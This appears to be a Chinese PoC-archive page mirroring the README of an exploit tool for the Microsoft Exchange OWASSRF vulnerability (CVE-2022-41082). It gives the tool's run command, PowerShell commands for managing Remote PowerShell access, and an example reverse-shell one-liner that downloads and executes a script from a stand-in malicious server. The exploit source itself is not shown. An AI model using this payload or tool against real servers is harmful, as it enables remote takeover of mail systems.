POC详情: 74af2085320b7013106e48fc1b54bf09466a99aa

来源
关联漏洞
标题: Microsoft Exchange Server 代码问题漏洞 (CVE-2022-41082)
描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server存在安全漏洞。攻击者利用该漏洞远程执行代码。
描述
CVE-2022-41082-poc
介绍
# CVE-2022-41082

This repository contains a proof-of-concept (PoC) tool for exploiting the **OWASSRF** vulnerability (CVE-2022-41082) in Microsoft Exchange servers. The exploit allows attackers to execute arbitrary commands on the server, potentially compromising the system.

## Overview

The tool leverages an **OWASSRF** vulnerability to bypass authentication and gain remote code execution (RCE) on an Exchange server. By exploiting this vulnerability, an attacker can execute commands as if they were an authenticated user, leading to severe security implications.

### How It Works

1. **Authentication Bypass**: The tool connects to the target Exchange server, bypassing authentication mechanisms using crafted requests.
2. **Remote Code Execution**: After successfully logging in, the tool opens a session that allows command execution on the Exchange server.
3. **Executing Commands**: Users can specify commands to be executed on the server, allowing for various actions, including file manipulation, network operations, or establishing reverse shells.

### Important Note

When using this tool, **please** ensure that you keep the same session of the Exchange Management Shell open. It is crucial to enable Remote PowerShell access for at least one user after disabling it for others. Otherwise, you may lose Management Shell access on all Exchange servers.

## Commands for Managing PowerShell Access

Here are some useful PowerShell commands to check and manage who has access:

### Check PowerShell Access

To see which users have Remote PowerShell access and which do not, run:

```powershell
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $false'
```

### Disable PowerShell Access for All Users

**Warning:** Be careful not to close the Exchange Management Shell window unless you add at least one user back.

You can disable PowerShell access for all users using the following commands:

```powershell
$user = Get-User -ResultSize Unlimited -Filter 'RemotePowerShellEnabled -eq $true'
$user | foreach {Set-User -Identity $_ -RemotePowerShellEnabled $false}
```

Or use a single command to achieve the same result:

```powershell
Get-User -ResultSize Unlimited | Set-User -RemotePowerShellEnabled $false
```

### Re-enabling Access for a Specific User

To grant Remote PowerShell access to a specific user, run:

```powershell
Set-User "guest" -RemotePowerShellEnabled $true
```

### Workaround for Losing PowerShell Access

If you lose PowerShell access for all users, you can create a new mailbox user with administrator rights. This new user will bypass the policies applied, allowing you to use the Exchange Management Shell again.

## Using the PoC Tool

### Requirements

- Python 3.x
- Required libraries (install via `pip` if necessary)

### Running the Tool

To execute the PoC tool, run the following command:

```bash
python3 poc.py -H <target_IP> -u <username> -p <password> -c <command_file>
```

Replace `<target_IP>`, `<username>`, `<password>`, and `<command_file>` with your specific values.

### Example Command for Reverse Shell

You can modify the command in your `cmd_file` to include a reverse shell payload. For example:

```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object Net.WebClient).DownloadString('http://your-malicious-server.com/reverse.ps1')"
```

This command will download and execute a PowerShell script from your server, giving you a reverse shell.

## References

For more information about the OWASSRF vulnerability and the PoC code, visit the following link: [OWASSRF CVE-2022-41082 PoC](https://github.com/balki97/OWASSRF-CVE-2022-41082-POC) and https://www.youtube.com/watch?v=c2DZYP6jc7g
文件快照

[4.0K] /data/pocs/74af2085320b7013106e48fc1b54bf09466a99aa ├── [5.2K] poc.py ├── [3.7K] README.md └── [ 9] requirements.txt 0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。